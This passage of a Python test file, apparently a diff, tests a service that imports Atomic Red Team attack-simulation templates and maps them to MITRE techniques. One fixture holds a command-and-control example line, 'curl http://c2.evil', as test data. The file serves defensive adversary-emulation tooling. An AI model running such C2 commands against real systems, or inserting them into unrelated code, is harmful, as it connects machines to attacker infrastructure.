zf.write(file_path, arcname) + zip_bytes = zip_buffer.getvalue() + mock_download.return_value = zip_bytes + + # --- First import --- + # Mock DB: no existing templates + db = MagicMock() + mock_query = MagicMock() + mock_query.filter.return_value.all.return_value = [] + db.query.return_value = mock_query + + added_templates = [] + def track_add(template): + added_templates.append(template) + db.add.side_effect = track_add + + result1 = import_atomic_red_team(db) + assert result1["created"] == 1 + assert result1["skipped_existing"] == 0 + + # --- Second import --- + # Now DB returns the existing template + db2 = MagicMock() + mock_query2 = MagicMock() + # Return the atomic_test_id that was already created + mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)] + db2.query.return_value = mock_query2 + + added2 = [] + db2.add.side_effect = lambda t: added2.append(t) + + result2 = import_atomic_red_team(db2) + assert result2["created"] == 0 + assert result2["skipped_existing"] == 1 + assert len(added2) == 0 + + print(" [PASS] Running twice does not duplicate templates") + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) + + +# --------------------------------------------------------------------------- +# 3. Templates mapped correctly to MITRE techniques +# --------------------------------------------------------------------------- + + +def test_templates_mapped_to_techniques(): + tmp_dir = tempfile.mkdtemp(prefix="aegis_test_") + try: + atomics = _create_fake_atomics(tmp_dir, { + "T1059.001": [ + { + "name": "Test", + "description": "Desc", + "supported_platforms": ["windows"], + "executor": {"name": "sh", "command": "echo hi"}, + }, + ], + "T1071.001": [ + { + "name": "HTTP C2", + "description": "HTTP-based C2", + "supported_platforms": ["linux"], + "executor": {"name": "bash", "command": "curl http://c2.evil"}, + }, + ], + }) + results = _parse_yaml_files(atomics) + + technique_ids = {r["technique_id"] for r in results} + assert "T1059.001" in technique_ids + assert "T1071.001" in technique_ids + + for r in results: + assert r["technique_id"].startswith("T") + + print(" [PASS] Templates mapped correctly to MITRE techniques") + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) + + +# --------------------------------------------------------------------------- +# 4. Service module structure is correct +# --------------------------------------------------------------------------- + + +def test_service_module_structure(): + """Verify the service has all expected public functions.""" + from app.services import atomic_import_service as svc + + assert hasattr(svc, "import_atomic_red_team") + assert callable(svc.import_atomic_red_team) + assert hasattr(svc, "ATOMIC_RT_ZIP_URL") + assert "github.com" in svc.ATOMIC_RT_ZIP_URL + print(" [PASS] Service module has correct structure") + + +# --------------------------------------------------------------------------- +# 5. ZIP URL is correct (no rate-limit concern with ZIP download) +# --------------------------------------------------------------------------- + + +def test_zip_url_no_rate_limit(): + """The URL should be a direct ZIP download, not an API endpoint.""" + assert "/archive/" in ATOMIC_RT_ZIP_URL + assert "api.github.com" not in ATOMIC_RT_ZIP_URL + print(" [PASS] ZIP download URL avoids API rate limits") + + +# --------------------------------------------------------------------------- +# Run all +# --------------------------------------------------------------------------- + +if __name__ == "__main__": + print("T-108 Validation: Atomic Red Team Import Service") + print("=" * 55) + test_parse_creates_templates() + test_no_duplicates() + test_templates_mapped_to_techniques() + test_service_module_structure() + test_zip_url_no_rate_limit() + print("=" * 55) + print("ALL T-108 validations PASSED!")